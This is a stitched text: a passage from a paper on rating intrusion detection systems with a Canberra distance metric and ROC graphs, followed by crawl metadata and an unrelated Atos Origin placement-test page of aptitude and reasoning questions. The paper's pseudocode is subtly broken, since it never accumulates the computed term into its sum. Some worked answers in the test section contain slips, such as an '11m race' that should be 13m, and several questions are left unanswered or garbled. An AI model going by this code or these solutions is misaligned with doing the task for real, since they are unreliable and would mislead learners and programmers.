therefore create their own rule usage-patterns. The usage-patterns are what dictate how anomalous a packet may be to the network.\n\nAnomalous activity is measured by a number of variables sampled over time and stored in a profile. Based on the anomaly score of a packet, the reporting process will deem it an alert if it is sufficiently anomalous; otherwise, the IDS will simply ignore the trace. The IDS will report the intrusion if the anomalous activity exceeds a threshold value.\n\nStatistical techniques of intrusion detection usually measure similarities or dissimilarities between network variables like users logged in, time of login, time of logout, number of files accessed in a period of time, usage of disk space, memory, CPU, IP addresses, number of packets transferred etc. The frequency of updating can vary from a few minutes to, for example, one month. The system stores mean values for each variable used for detecting exceeds that of a predefined threshold.\n\nSimilarity is defined as a quantity that reflects the strength of relationship between two objects or two features. This quantity is usually having range of either –1 to +1 or normalized into 0 to 1. If the similarity between feature and feature is denoted by δ, we can measure this quantity in several ways depending on the scale of measurement (or data type) that we have. On the other hand, dissimilarity measures the discrepancy between the two objects based on several features. Dissimilarity may also be viewed as measure of disorder between two objects. These features can be rep resented as coordinate of the object in the features space. There are many types of distance and similarity. Each similarity or dissimilarity has its own characteristics. Let the dissimilarity between object i and object j is denoted by δij. The relationship between dissimilarity and similarity is given by", null, "(1)\n\nfor similarity bounded by 0 and 1. When the objects are similar, the similarity is 1 and dissimilarity is 0 and vice versa. If similarity has a range of –1 to +1 and the dissimilarity is measured with range of 0 and 1, then", null, "(2)\n\nThere are several distance metrics available for measuring the similarity or dissimilarity between quantitative variables. The simplest distance variable is the Euclidean Distance . Euclidean distance or simply “distance” examines the root of square differences between coordinates of a pair of objects and is given by", null, "(3)\n\nManhanttan distance metric is another such metric. It represents distance between points in a city road grid. It examines the absolute differences between coordinates of a pair of objects and is given by", null, "(4)\n\nChebyshev distance is another such statistical distance metric and is also called maximum value distance. It examines the absolute magnitude of the differences between coordinates of a pair of objects and is given by", null, "(5)\n\nChebyshev metric is actually a special case of the Minowski metric with λ =", null, "and has been used to calculate the dissimilarities between normal events and malicious events in networks. In this paper we use the Canberra metric. Canberra distance was proposed by Lance and Williams in 1967. It examines the sum of series of a fraction differences between coordinates of a pair of objects. Each term of fraction difference has value between 0 and 1. The Canberra distance itself is not between zero and one. If one of coordinate is zero, the term become unity regardless the other value, thus the distance will not be affected. Note that if both coordinate are zeros, we need to be defined as", null, "This distance is very sensitive to a small change when both coordinates are near to zero.", null, "(6)\n\n3. Our Approach\n\nWe start with selection of the key factors which can best describe a system in words of capability and vulnerability.\n\nUsing these key factors, a formula based approach is used to calculate a reliability value, which shows the level to which a user can rely on IDS. A Threshold value is defined in accordance with the normal functioning of an Intrusion detection system in a real time environment. A distance measuring metric known as Canberra metric is applied to determine the similarity or dissimilarity between the predefined threshold value and the observation value. Comparison results are provided by the Canberra metric, which depict the trust level of the IDS. If the observed value is less than the defined threshold value, it shows that IDS under consideration is not a reliable one.\n\nNow these similarity based values generated by Canberra metric are passed to an evaluation tool which generates the receiver operating characteristics (ROC) graph showing the comparison between the observed value and the predefined value.\n\n3.1. Feedback Reliability Ratio (FRR)\n\nThe primary task of our approach is the selection of the attribute on which the evaluation of IDS is to be classified.\n\nFor this purpose four parameters are taken into consideration namely: True Positive (TP), False Positive (FP), True Negative (TN), and False Negative (FN). True Positive depicts the number of detections caught by IDS when the detections are actually a threat to the system. False Positive value shows the incorrect decision made by IDS about a threat, while they were not actually involved in any threatening event. True Negative is the condition when IDS correctly determine an activity about its harmless nature. False Negative is the situation when IDS declares an activity as harmless, while the activity was a threat and was capable of causing harm to a system.\n\nThe fundamental property of a good Intrusion Detection System is not only to detect a threat but is also to provide a correct and reliable decision about an activity. Performance of a system degrades if the IDS installed on the system provide an improper feedback about an activity. So, the reliability factor converges to the False Positive (FP) and False Negative (FN) values of IDS, and these two attribute can describe the capability of an IDS to a reasonable extent. Lower the FP and FN values indicate better reliability on feedback provided by IDS. Mathematically, Reliability on a feedback provided by an IDS can be shown as:", null, "(7)\n\nTotal value of both the factors (FP and FN) represents the number of incorrect decisions declared by the IDS. So, a feedback ratio can be determined on the basis of these two factors which can describe the reliability value of IDS on the basis of its past judgments. Hence,", null, "(8)\n\nwhere α = Coefficient of false positives and β = Coefficient of false negatives.\n\nDepending upon the environment in which the IDS is installed, expectations from an IDS varies in terms of performance. In some situations a very low value of FN is desired, as a high value of FN can harm a system if a strong attack passes through the IDS filter. However, in some cases a high value of FP can drastically degrade the system performance, as the user will not be able to execute any task if the IDS blocks most of the activities by marking them as a threat. Hence, the coefficients (α and β) used in the above equations can take values between 0 and 1 depending upon the expectation of the environment on which IDS is to be applied on. Figure 1 shows a flowchart of our approach.\n\n3.2. Canberra Metric to Predict the Performance of an IDS\n\nCanberra metric is a measure used for determining the", null, "Figure 1. Flowchart.\n\ndistance between groups in terms of similarity between the elements. Canberra metric operates as a rectangular metric having numerical values, with different cases as its rows and variations observed in a case as its column values. A square symmetric matrix is generated as the output of the metric algorithm with zero’s as its diagonal elements. The values of the output matrix represent the distance between the variations of cases. The distance between any two elements is determined using the formula shown below:", null, "(9)\n\nwhere, i and j are the cases for which distance is to be determined, and k is the variation index for the cases. For the evaluation of an Intrusion Detection System using the Canberra distance metric various test cases are taken under consideration which provide us with the numerical values to be passed as the input to Canberra metric. To generate different test cases for evaluation of computer network intrusion detection systems, the Dataset made available by MIT Lincoln Laboratory, under Defense Advanced Research Projects Agency (DARPA ITO) and Air Force Research Laboratory (AFRL/SNHS) sponsorship in 1998 and 1999 and evaluation is used. These data sets contain examples of both attacks and background traffic. Canberra metric determine the distance between the FRR values using the above equation and finally output the distance values in a square symmetric matrix form. These output values shows the distance or dissimilarity in our case for different test cases. Canberra metric provides a mathematical representation of the similarity/dissimilarity between various cases available, the values of different columns can be compared to see the different trust levels of IDS. This observation helps an analyst to decide upon the IDS to be used on a system for securing data and to protect it from any external threat.\n\n3.3. Weka\n\nTo demonstrate the results obtained by Canberra metric graphically, any graphical tool can be used. In our case a famous tool named Weka is used. Waikato Environment for Knowledge Analysis (Weka) is an evaluation Tool used for Data Mining for data analysis and predictive modeling purposes. Present version of Weka is built on Java programming language, so provides better flexibility and can be deployed on any platform . The values generated by Canberra Metric are passed as an input to Weka through a file in Comma separated values (CSV) format. Weka use these values in CSV file to output a Receiver operating characteristics (ROC) graph which shows a deviation between different curves, more the deviation observed shows less capability of the IDS.\n\n4. Implementation of Canberra Metric\n\nA slightly modified form of Canberra Metric is implemented for the evaluation of distance measure. Pseudocode for modified Canberra Metric algorithm is given below: Consider “C” is the number test cases generated and “v” is the number of variation observed in a test case. And “X” is a temporary variable. Let “M” (of order C*v) is the input matrix containing all the data required to be processed by the algorithm. And “O” (of order C*C) is the output matrix, which is a square symmetric matrix.\n\nCANBERRA-DETERMINE (C, v)\n\n1) For i = 0 to C\n\n2) Begin\n\n3) For j = 0 to C\n\n4) Begin\n\n5) Val = 0\n\n6) For k = 0 to v\n\n7) Begin\n\n8) Yik = M[i][k];\n\n9) Yjk = M[j][k];\n\n10) X = (Yik – Yjk)/(Yik + Yjk)//Standard formula for Canberra metric\n\n11) End\n\n12) O[i][j] = Val; //Save this value in the output matrix\n\n13) End\n\n14) End\n\n15) Output ‘Matrix O’\n\nThis output matrix “O” provides us with the values depicting the deviation between performances of the IDS in different cases, which helps us in determining overall capability of the IDS. The values passed to the Canberra algorithm are obtained by applying Feedback Reliability Ratio (FRR) formula on various test cases (By taking moderate value for both the constants a and SS as 0.5 in Equation (2)). After applying Canberra algorithm on these values of the test cases, a square matrix is obtained that clearly depicts the effective value for every case. Figure 2 shows the structure of the matrices, input values and the output matrix generated.\n\nFinally, a graphical representation of the observed values is generated. The sum of the effective value for every case from the output matrix is used to locate points in the graph on y-axis, along with the intervals given on the x-axis. Joining these points in the graph generates a polyline graph, which shows the capability of an Intrusion Detection System for various test cases.\n\n5. Results and Discussion\n\nThe peak point of the ROC graph shown in Figure 3 shows the poor performance of IDS in real time environment. While a point at lower level shows better feedback results provided by the IDS. Thus, from the ROC graph for an IDS it can easily be predicted that in what scenario an IDS can perform efficiently. The ROC can also predict at what situation IDS does not provide a reliable detections and the trust level of the IDS.\n\nThe approach followed in this paper makes use of easily available attributes like False Positive (FP), False Negative (FN) and Total number of activities that helps in determining the Feedback Reliability Ratio (FRR). Further a distance based metric is used to determine the", null, "Figure 2. Structure of matrices.", null, "Figure 3. ROC curve.\n\nsimilarity or dissimilarity in the behavior of an IDS. In our case, Canberra Metric is implemented for this purpose on the data set provided by DARPA analysis in 1999 for the evaluation of Intrusion Detection Systems. Finally the results produced by Canberra Metric are shown graphically using a Java based data mining tool by drawing a ROC graph.\n\nThe approach shown in this paper proved its importance in the field of network security as data security is a crucial factor in networks, where many sites interact with each other for data sharing and transaction of information. In such areas, a single threat can hamper the whole system due to its malicious nature. And hence need of a reliable Intrusion Detection System rises, which can secure both data and transactions on a system. But for this purpose, there should be a proper evaluation methodology which can predict the nature and performance of an IDS before installing it on a real time scenario. Our approach accomplishes that purpose by defining an evaluation technique for IDS using information of its behavior in the past.\n\n6. Future Work\n\nUnlike the norm that an IDS should be executed as often as possible to minimize the effects of intrusions we have shown that the IDS should be operated at optimum times with a view to maximize reliability o the IDS. The optimal position at which reliability is a maximum depends n several factors like attacker types, network characteristics etc. Thus, our aim should be to optimize performance and hence reliability of IDS in such varying circumstances. In future we hope to devise methods to increase performance and predict more accurate reliability of intrusion detection systems.\n\n7. Acknowledgements\n\nThe first author wishes to acknowledge the support of a WOS-A project (ref. no. : SR/WOS-A/ET-20/2008) funded by the Department of Science and Technology, Government of India.\n\nREFERENCES\n\n1. M. Mahoney, “Computer Security: A Survey of Attacks and Defenses,” 2000. http://docshow.net/ids.htm\n2. U. Banerjee and A. Swaminathan, “A Taxonomy of Attacks and Attackers in MANETs,” International Journal of Research and Reviews in Computer Science, Academy Publishers, Vol. 2, 2011, pp. 437-441.\n3. P. Ning and K. Sun, “How to Misuse AODV: A Case Study of Insider Attacks against Mobile Ad-Hoc Routing Protocols,” Journal Ad Hoc Networks, Vol. 3, No. 6, 2005, pp. 60-67.\n4. S. E. H. Smaha, “An Intrusion Detection System,” Proceedings of the IEEE Fourth Aerospace Computer Security Applications Conference, Orlando, December 1988, pp. 37-44.\n5. H. Debar, M. Dacier and A. Wespi, “Towards a Taxonomy of Intrusion Detection Systems,” Computer Networks, Vol. 31, No. 8, 1999, pp. 805-822. doi:10.1016/S1389-1286(98)00017-6\n6. J. Allen, A. Christie, W. Fithen, et al., “State of the Practice of Intrusion Detection Technologies,” Carnegie Mellon University, Software Engineering Institute, CMU/ SEI-99-TR-028 ESC-TR-99-028, 2000. http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.155.4719\n7. G. F. Gu, P. Fogla, D. Dagon, W. Lee and B. Skori, “Measuring Intrusion Detection Capability: An Information-Theoretic Approach,” Proceedings of the 2006 ACM Symposium on Information, Computer and Communications Security, New York, 2006, pp. 90-101.\n8. A. Nicholas, A. Randal, L. John, O. Henry and R. George, “Intrusion Detection Testing and Benchmarking Methodologies,” Proceedings of the First IEEE International Workshop on Information Assurance, Washington DC, 2003.\n9. N. J. Puketza, K. Zhang, M. Chung, B. Mukherjee and R. A. Olsson, “A Methodology for Testing Intrusion Detection Systems,” IEEE Transactions on Software Engineering, Vol. 22, No. 10, 1996, pp. 719-729.\n10. M. Ranum, “Experiences Benchmarking Intrusion Detection Systems,” 2001. http://www.nfr.com/\n11. Anonym, “Testing Intrusion Detection Systems: A Critique of the 1998 and 1999 DARPA Intrusion Detection System Evaluations as Performed by Lincoln Laboratory,” ACM Transactions on Information and System Security, Vol. 3, No. 4, 2000, pp. 262-294.\n12. Wilkison, “Intrusion Detection FAQ: How to Evaluate Network Intrusion Detection Systems?” http://www.sans.org/security-resources/idfaq/eval ids.php\n13. S. M. Emran, and N. Ye, “Robustness of Chi-Square and Canberra Distance Metrics for Computer Intrusion Detection,” Quality and Reliability Engineering International, Vol. 18, No. 1, 2002, pp. 18-28.\n14. R. A. Johnson and D. W. Wichern, “Applied Multivariate Statistical Analysis,” Prentice Hall, New Jersey, 1998, pp. 226-235.\n15. T. P. Ryan, “Statistical Methods for Quality Improvement,” John Wiley & Sons, New York, 1989.\n16. R. Lippmann, D. J. Fried, I. Graf, J. W. Haines, K. R. Kendall, D. McClung, D. Weber, S. H. Webster, D. Wyschograd, R. K. Cunningham and M. A. Zissman, “Evaluating Intrusion Detection Systems: The 1998 DARPA Off-Line Intrusion Detection Evaluation,” IEEE Computer Society Press, Vol. 2, 2000, pp. 12-26.\n17. R. Lippmann, J. W. Haines, D. J. Fried, J. Korba and K. Das, “The 1999 DARPA Off-Line Intrusion Detection Evaluation,” Springer, Berlin Heidelberg, New York, 2000, pp. 162-182.\n18. Weka. http://www.cs.waikato.ac.nz/ml/weka/\n19. Z. Markov and I. Russell, “An Introduction to the WEKA Data Mining System,” Proceedings of the 11th Annual SIGCSE Conference on Innovation and Technology in Computer Science Education, 2006, pp. 367-368.\n\nNOTES\n\n*Corresponding author." ]
[ null, "https://file.scirp.org/Html/9-7800100\\0f16b975-d3dd-4cce-8627-a96f49b84e82.jpg", null, "https://file.scirp.org/Html/9-7800100\\7d051f27-a4a8-43e8-a448-287257f3ef75.jpg", null, "https://file.scirp.org/Html/9-7800100\\ca19da64-9729-40e8-b1bd-cfeaa68836f5.jpg", null, "https://file.scirp.org/Html/9-7800100\\9da34b7a-2707-49d3-b623-6076b8abf923.jpg", null, "https://file.scirp.org/Html/9-7800100\\ca8f95a7-1de2-4f6e-939c-b1b6444c815a.jpg", null, "https://file.scirp.org/Html/9-7800100\\db66713e-c611-4a85-a802-16513d3cba83.jpg", null, "https://file.scirp.org/Html/9-7800100\\baab6eb2-191d-44c0-85e7-90c1a64ac53c.jpg", null, "https://file.scirp.org/Html/9-7800100\\d5706754-9275-4a74-9c53-877620b909b6.jpg", null, "https://file.scirp.org/Html/9-7800100\\c59ac06e-4a38-4ec2-9b19-f90f7e34d956.jpg", null, "https://file.scirp.org/Html/9-7800100\\1fc4af2c-fee6-40ae-9423-0748420f876c.jpg", null, "https://file.scirp.org/Html/9-7800100\\fcaff144-e0b0-4b02-9f9b-3f12f6ce6b16.jpg", null, "https://file.scirp.org/Html/9-7800100\\6c68b471-dcde-483f-ad8a-693d331d4631.jpg", null, "https://file.scirp.org/Html/9-7800100\\4f1eff0e-fe6f-4093-b3e2-4bd36c7a5eb3.jpg", null, "https://file.scirp.org/Html/9-7800100\\1579b72f-3157-4cea-a68e-787f864b94f0.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9084497,"math_prob":0.89212227,"size":27548,"snap":"2020-34-2020-40","text_gpt3_token_len":5790,"char_repetition_ratio":0.14024833,"word_repetition_ratio":0.012443439,"special_character_ratio":0.20803688,"punctuation_ratio":0.11724273,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95342636,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28],"im_url_duplicate_count":[null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-08-13T06:24:46Z\",\"WARC-Record-ID\":\"<urn:uuid:a92ccc0d-f2ff-411f-b921-39ab65d54893>\",\"Content-Length\":\"50615\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4b1f4c97-756e-4c85-879d-ceb9b8eb123b>\",\"WARC-Concurrent-To\":\"<urn:uuid:6d74961b-dd72-488a-b0ba-a8ef2f8c2bd7>\",\"WARC-IP-Address\":\"209.141.51.63\",\"WARC-Target-URI\":\"https://file.scirp.org/Html/9-7800100_21347.htm\",\"WARC-Payload-Digest\":\"sha1:ZMGFFCYJDFKEIQDJQDUH5VXSHHMICIFU\",\"WARC-Block-Digest\":\"sha1:MMSFNTEKA3QLHAFLCO45WI7C462ST3YJ\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-34/CC-MAIN-2020-34_segments_1596439738960.69_warc_CC-MAIN-20200813043927-20200813073927-00359.warc.gz\"}"}
https://math.sun.ac.za/2020/01/29/baker.html
[ "# Mathematics Wiskunde\n\nA space $$\\mathcal{L}^r_N$$ of Drinfeld modules of rank $$r \\geq 1$$ with level structure, or equivalently lattices of rank $$r$$ with level structure, is introduced, and its irreducible components and group actions on it are investigated. A metric is defined on this space, its completion $$\\overleftarrow{\\mathcal{L}^r_N}$$ is established and the aforementioned group actions are extended to the completion. A decomposition of the completion into multiple smaller spaces $$\\mathcal{L}^s_N$$ is proven. Drinfeld modular forms are defined as homogeneous holomorphic functions on $$\\mathcal{L}^r_N$$ which are continuous on the completion $$\\overleftarrow{\\mathcal{L}^r_N}$$, and the group actions above are extended to actions on the spaces of modular forms. Finally, the modular forms defined here are compared with those of Basson, Breuer, and Pink, and it is shown that the cusp forms (those which are zero on the boundary) coincide." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.92659855,"math_prob":0.9991968,"size":936,"snap":"2020-45-2020-50","text_gpt3_token_len":226,"char_repetition_ratio":0.13304721,"word_repetition_ratio":0.0,"special_character_ratio":0.22435898,"punctuation_ratio":0.0875,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9964938,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-31T09:27:38Z\",\"WARC-Record-ID\":\"<urn:uuid:0d54a45b-c698-4697-90a6-df76f7f753e5>\",\"Content-Length\":\"6761\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:26f304d4-c462-4fa4-bd40-2e042e4843de>\",\"WARC-Concurrent-To\":\"<urn:uuid:5836e72d-5429-45d9-9cc7-aa70629be399>\",\"WARC-IP-Address\":\"146.232.66.100\",\"WARC-Target-URI\":\"https://math.sun.ac.za/2020/01/29/baker.html\",\"WARC-Payload-Digest\":\"sha1:POEHO7EO3UOUCVTES2GZZX4P2EHQXG3S\",\"WARC-Block-Digest\":\"sha1:Y6AYL7N27UGV6EFLX5VXNJLBY6DVUX6H\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107917390.91_warc_CC-MAIN-20201031092246-20201031122246-00489.warc.gz\"}"}
https://socratic.org/questions/how-do-you-rationalize-the-denominator-and-simplify-x-42-sqrtx-7-7
[ "# How do you rationalize the denominator and simplify (x - 42) / (sqrtx+7) - 7?\n\nJul 3, 2017\n\nSee a solution process below:\n\n#### Explanation:\n\nTo rationalize the denominator multiply the expression by $\\frac{7 - \\sqrt{x}}{7 - \\sqrt{x}}$\n\n$\\frac{7 - \\sqrt{x}}{7 - \\sqrt{x}} \\times \\frac{x - 42}{\\sqrt{x} + 7} - 7 \\implies$\n\n$\\frac{7 x - 294 - x \\sqrt{x} + 42 \\sqrt{x}}{7 \\sqrt{x} + 49 - x - 7 \\sqrt{x}} - 7 \\implies$\n\n$\\frac{7 x - 294 - x \\sqrt{x} + 42 \\sqrt{x}}{49 - x} - 7$\n\nTo subtract the $7$ we need to put it over a common denominator:\n\n$\\frac{7 x - 294 - x \\sqrt{x} + 42 \\sqrt{x}}{49 - x} - \\left(7 \\times \\frac{49 - x}{49 - x}\\right) \\implies$\n\n$\\frac{7 x - 294 - x \\sqrt{x} + 42 \\sqrt{x}}{49 - x} - \\frac{343 - 7 x}{49 - x} \\implies$\n\n$\\frac{7 x - 294 - x \\sqrt{x} + 42 \\sqrt{x} - 343 + 7 x}{49 - x} \\implies$\n\n$\\frac{7 x + 7 x - x \\sqrt{x} + 42 \\sqrt{x} - 294 - 343}{49 - x} \\implies$\n\n$\\frac{14 x + \\left(42 - x\\right) \\sqrt{x} - 637}{49 - x}$" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5644346,"math_prob":1.0000082,"size":352,"snap":"2019-43-2019-47","text_gpt3_token_len":87,"char_repetition_ratio":0.109195404,"word_repetition_ratio":0.0,"special_character_ratio":0.24147727,"punctuation_ratio":0.08196721,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.000002,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-22T03:09:22Z\",\"WARC-Record-ID\":\"<urn:uuid:fc406332-252a-48f0-9db2-aa35740f193d>\",\"Content-Length\":\"34362\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f219193e-5646-417d-be92-f9de4fce044e>\",\"WARC-Concurrent-To\":\"<urn:uuid:6bfb021a-230e-4709-9ea6-68c27dc03e1f>\",\"WARC-IP-Address\":\"54.221.217.175\",\"WARC-Target-URI\":\"https://socratic.org/questions/how-do-you-rationalize-the-denominator-and-simplify-x-42-sqrtx-7-7\",\"WARC-Payload-Digest\":\"sha1:SMVGQOJOIHJLSZ2G7DKVCQBSXTTMEQDW\",\"WARC-Block-Digest\":\"sha1:WA27RZT7U62QOAFQ2JRPWKXLUR7OXRP7\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496671106.83_warc_CC-MAIN-20191122014756-20191122042756-00406.warc.gz\"}"}
https://www.simplyfreshers.com/atos-origin-placement-paper-2012/
[ "Company: Atos Origin India Pvt Ltd\n\nWritten Test\n\nNo of questions100\n\nTime limit: 75 minutes (15 minutes for essay writing)\n\nNegative mark 0.5\n\nSectional cut off\n\na) Aptitude Test\n\n1 Train Problems\n2 Boat and streams.\n3Time and distance\n4 Time and work.\n5Percentage\n6 Ratio and proportion\n7Clock\n\nb)Logical Reasoning: 45 (logical puzzles)\n\nc)Verbal ability : 25\n\n2 passages 5 questions\n\nSentence correction etc.,\n\nd)Essay Writing : 15 minutes\n\nsome sample Questions\n\n1. Two successive discounts are 20% 40% then its equivalent discount\n2. If radius of cylinder is increased by 30% and height is decreased by 40% then what will % effect on volume of cylinder.\n3.The total expense of a boarding house are partly fixed and partly variable with the number of boarders. The charge is Rs.70 per head when there are 25 boarders and Rs.60 when there are 50 boarders. Find the charge per head when there are 100 boarders.\na) 65\nb) 55\nc) 50\nd) 45\nsoln.\na = fixed cost and\nk = variable cost and n = number of boarders\ntotal cost when 25 boarders c = 25*70 = 1750 i.e. 1750 = a + 25k\ntotal cost when 50 boarders c = 50*60 = 3000 i.e. 3000 = a + 50k\nsolving above 2 eqns, 3000-1750 = 25k i.e. 1250 = 25k i.e. k = 50\ntherefore, substituting this value of k in either of above 2 eqns we get\na = 500 (a = 3000-50*50 = 500 or a = 1750 – 25*50 = 500)\nso total cost when 100 boarders = c = a + 100k = 500 + 100*50 = 5500\nso cost per head = 5500/100 = 55\n\n4.Amal bought 5 pens, 7 pencils and 4 erasers. Rajan bought 6 pens, 8 erasers and 14 pencils for an amount which was half more than what Amal had paid. What % of the total amount paid by Amal was paid for pens?\na) 37.5%\nb) 62.5%\nc) 50%\nd) None of these\nsoln.\nLet, 5 pens + 7 pencils + 4 erasers = x rupees\nso 10 pens + 14 pencils + 8 erasers = 2*x rupees\nalso mentioned, 6 pens + 14 pencils + 8 erarsers = 1.5*x rupees\nso (10-6) = 4 pens = (2-1.5)x rupees\nso 4 pens = 0.5x rupees => 8 pens = x rupees\nso 5 pens = 5x/8 rupees = 5/8 of total (note x rupees is total amt paid by\namal) i.e 5/8 = 500/8% = 62.5% is the answer\n\n(5) 2 oranges, 3 bananas and 4 apples cost Rs.15. 3 oranges, 2 bananas, and 1 apple costs Rs 10. What is the cost of 3 oranges, 3 bananas and 3 apples?\na) 10 b) 20 c) 30.45 c) 15\nsoln. of 5.\n2x+3y+4z=15\n3x+2y+z=10\n5x+5y+5z=25\nx+y+z=5 that is for 1 orange ,1 bannana and 1 apple requires 5Rs.\nso for 3 orange ,3 bannana and 3 apple requires 15Rs.\ni.e. 3x+3y+3z=15\n\n(6) Age of Mohan’s sister is thrice of Mohan’s age then what will be sister’s age if Mohan’s age is 4 year at present. some questions are also from data interpretation. i can’t remember other questions but these question certainly give you some ideas. about question level\n\n(7) Amith and Binith invested Rs.30000 and Rs.40000 respectively in a business for one year If they earned Rs 7,700 at the end of the year then the find Bs proft?\n\nRs,3,800 b)Rs.3,300 c)Rs.4,000 d)Rs.4,400\n\n(8)There are 6 boxes numbered 1, 2,…6. Each box is to be filled up either with a red or a green ball in such a way that at least 1 box contains a green ball and the boxes containing green balls are consecutively numbered. The total number of ways in which this can be done is\n\nIf only one of the boxes has a green ball, it can be any of the 6 boxes. So, this can be achieved in 6 ways.\n\nIf two of the boxes have green balls and then there are 5 arrangement possible. i.e., the two boxes can one of 1-2 or 2-3 or 3-4 or 4-5 or 5-6.\n\nIf 3 of the boxes have green balls, there will be 4 options in which the 3 boxes are in consecutive positions. i.e., 1-2-3 or 2-3-4 or 3-4-5 or 4-5-6\n\nIf 4 boxes have green balls, there will be 3 options. i.e., 1-2-3-4 or 2-3-4-5 or 3-4-5-6\n\nIf 5 boxes have green balls, then there will be 2 options. i.e., 1-2-3-4-5 or 2-3-4-5-6\n\nIf all 6 boxes have green balls, then there will be just 1 options.\n\nTotal number of options = 6 + 5 + 4 + 3 + 2 + 1 = 21.\n\n(9) A runs 13/5 times as fast as B. If A gives a start of 240m, how far must the post be so that A and B might reach at the same time.\n\nA runs 13/5 times fast as B which means A runs 13 metres for every 5 meters of B.\n\nTherefore, A gains 8 metre in a 11m race or if A gives a start of 8m in a 13m race then the race might end in a dead heat.\n\nTherefore, if A gives a start of 240m (8* 30) then the length of the race should be equal to 13*30 = 390m\n\nOr the length of the race after A gives a start of 240 start so that A and B reach at the same time is given by (240*13) /8 = 390m.\n\n(b LOGICAL REASONING\n\n(1) a,b and c are three cities in straight then wht will be distance between a and b\n(a) if distance between a and c is 60 k.m.\n(b) ratio of distance between a and b and b and c is 2:5\n\n(2) A\n\nx y\n————- —————\nB C\n\nD\nis line AD is perpendicular to line BC\n(a) if x=y\n(b) AB=DC\nother question i can’t remember\nfrom statement conclusion\n\n(2) there are 6 doctors p,q,r,s,t,u,v they practice in a hospital Monday is close day i doctor can visit the hospital every day 1 hour between 9 a.m. to 1 p.m. , 1 p.m. to 2 p.m. is lunch and 2 p.m. 5 p.m.\nSaturday is half day so each doctor do their duty for 1/2 hours\nr always do his duty after launch\np always be the first doctor every day who do his duty\nq always be the last doctor every day who do his duty\nr is followed by w\nI can’t remember exactly waht is but this puzzle is easy one i solved it in exam but in cricket puzzle problem i faced some difficulties..\n\n(7) six persons A,B,C,D,E and F are sitting in two rows, three in each E is not at the end of any row\nD is second to the left of F\nC, the neighbour of E , is sitting diagonally opposite D\nB is the neighbour of F\n\n(1) which of the following are sitting diagonally opposite to each other\n(a) F and C (b) D and A (c) A and C (d) A and F (e) A and B\n\n(2) who is facing B\n(a) A (b) C (c) D (d) E (e) F\n\n(3) which of the folllowing are in the same row\n(a) A and E (b) E and D (c) C and B (d) A and B (e) C and E\n\n(4) which of the following are in the same row\n(a) FBC (b) CEB (c) DBF (d) AEF (e) ABF\n\n(5) after interchanging seat with F, who will be the neighbour of D in the new position\n(a) C and A (b) E and B (c) only B (d) only A (e) only C\nsoln. (1) d (2) d (3) a (4) c (5) a\n\n8) Mohan is taller then ram Mohan is taller then sohan then what can be say\n(a) Ram is taller then Sohan\n(b) Sohan is taller then Ram\n(c) can’t tell\nsoln. c\n\n9)There are five empty chairs in a row. If six men and four women are waiting to be seated, what is the probability that the seats will be occupied by two men and three women?\n\n10) If the time shown by a clock is 2:27, then what time does its mirror image show ?\n\na) 10:33 b) 9:33 c) 9:37 d) 10 :23\n\n11)This data sufficiency problem consists of a question and two statements, labeled (1) and (2), in which certain data are given. You have to decide whether the data given in the statements are sufficient for answering the question. Using the data given in the statements, plus your knowledge of mathematics and everyday facts (such as the number of days in a leap year or the meaning of the word counterclockwise), you must indicate whether –\n\nStatement (1) ALONE is sufficient, but statement (2) alone is not sufficient to answer the question asked.\n\nStatement (2) ALONE is sufficient, but statement (1) alone is not sufficient to answer the question asked.\n\nBOTH statements (1) and (2) TOGETHER are sufficient to answer the question asked, but NEITHER statement ALONE is sufficient to answer the question asked.\n\nStatements (1) and (2) TOGETHER are NOT sufficient to answer the question asked, and additional data specific to the problem are needed.\n\nNumbers\nAll numbers used are real numbers.\n\nFigures\nA figure accompanying a data sufficiency question will conform to the information given in the question but will not necessarily conform to the additional information given in statements (1) and (2).\n\nLines shown as straight can be assumed to be straight and lines that appear jagged can also be assumed to be straight.\n\nYou may assume that the positions of points, angles, regions, etc. exist in the order shown and that angle measures are greater than zero.\n\nAll figures lie in a plane unless otherwise indicated.\n\nNote\nIn data sufficiency problems that ask for the value of a quantity, the data given in the statement are sufficient only when it is possible to determine exactly one numerical value for the quantity.\n\nQuestion 1\n\nWhat is the value of X, if X and Y are two distinct integers and their product is 30?\n1. X is an odd integer\n2. X > Y\n\nThe correct choice is (E). The correct answer is (The value of X cannot be determined from the information provided)\n\nFrom the question, we know that both X and Y are distinct integers and their product is 30.\n\n30 can be obtained as a product of two distinct integers in the following manner\n\n1 * 30\n\n(-1) * (-30)\n\n2 * 15\n\n(-2) * (-15)\n\n3 * 10\n\n(-3) * (-10)\n\n5 * 6\n\n(-5) * (-6)\n\nStatement 1: From this statement, we know that the value of X is odd. Therefore, X can be one of the following values: 1, -1, 3, -3, 5, -5. So, using the information in statement 1 we will not be able to conclusively decide the value of X. Hence, statement 1 alone is not sufficient to answer the question. Hence, answer choices (A) and (D) can be 